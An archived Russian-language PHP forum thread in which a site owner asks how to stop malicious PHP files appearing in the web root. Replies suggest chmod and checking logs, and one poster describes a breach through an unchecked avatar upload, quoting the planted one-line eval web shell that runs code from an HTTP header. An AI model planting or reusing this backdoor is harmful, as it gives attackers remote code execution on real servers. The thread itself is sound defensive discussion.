Полная Версия: Как запретить создавать файлы в рут папке сайта ?
Здравствуйте. У меня такая проблема: в рут папке сайта создаются php файлы с вредоносным кодом. Как запретить создавать файлы в корне сайта ?
Ну для начала надо понять, откуда они там вообще берутся, я так думаю.
_____________
* Хэлп по PHP
* Описалово по JavaScript
* Хэлп и СУБД для PostgreSQL
* Обучаю PHP, JS, вёрстке. Интерактивно и качественно. За разумные деньги.
* "накапливаю умение телепатии" (С) и "гуглю за ваш счет" (С)
_____________
* Хэлп по PHP
* Описалово по JavaScript
* Хэлп и СУБД для PostgreSQL
* Обучаю PHP, JS, вёрстке. Интерактивно и качественно. За разумные деньги.
* "накапливаю умение телепатии" (С) и "гуглю за ваш счет" (С)
chmod 0444 /var/www/html/ ну или какая у вас там папка.
Если нету ссх доступа - тоже самое можно сделать фтп клиентом.
_____________
"Нужно быть готовым прислушиваться к тем, кто может тебя чему-нибудь научить. Иначе ты никогда не вырастешь."
Откровенно я никому ниразу не нагрубил. А дать подзатыльник зарвавшемуся юнцу, так это и ему на пользу, и мне в удовольствие. © AllesKlar
Если нету ссх доступа - тоже самое можно сделать фтп клиентом.
_____________
"Нужно быть готовым прислушиваться к тем, кто может тебя чему-нибудь научить. Иначе ты никогда не вырастешь."
Откровенно я никому ниразу не нагрубил. А дать подзатыльник зарвавшемуся юнцу, так это и ему на пользу, и мне в удовольствие. © AllesKlar
| Цитата (sergeiss @ 5.03.2017 - 16:29) |
| Ну для начала надо понять, откуда они там вообще берутся, я так думаю. |
Не верно. Сначала костыль, потом уж искать..
_____________
"Нужно быть готовым прислушиваться к тем, кто может тебя чему-нибудь научить. Иначе ты никогда не вырастешь."
Откровенно я никому ниразу не нагрубил. А дать подзатыльник зарвавшемуся юнцу, так это и ему на пользу, и мне в удовольствие. © AllesKlar
А по логам сервера уже не ищут?, кто когда зачем и почему...
зы: хотя я косяка было дело - упорол, залили картинку как файл php(не поставил проверку - балбес) и спокойненько делали что хотели через вот такую хрень
зы: хотя я косяка было дело - упорол, залили картинку как файл php(не поставил проверку - балбес) и спокойненько делали что хотели через вот такую хрень
<?php eval($_SERVER['HTTP_PHPSPL01T']); ?>отследил так же по логам
| Цитата (walerus @ 10.03.2017 - 00:45) |
| залили картинку как файл php(не поставил проверку - балбес) и спокойненько делали что хотели через вот такую хрень |
Ну залили картинку как файл ПХП... Не понял, что именно они залили и как это влияло. Вместо имени картинки, что ли, задали код ПХП, а ты его без проверки вставлял куда-то в тэги?
_____________
* Хэлп по PHP
* Описалово по JavaScript
* Хэлп и СУБД для PostgreSQL
* Обучаю PHP, JS, вёрстке. Интерактивно и качественно. За разумные деньги.
* "накапливаю умение телепатии" (С) и "гуглю за ваш счет" (С)
sergeissНу почти, аватарка пользователя грузилась и соответственно адрес картинки(файла пхп) был известен, ну и т.д. написал в личку если интересно...
Здесь расположена полная версия этой страницы.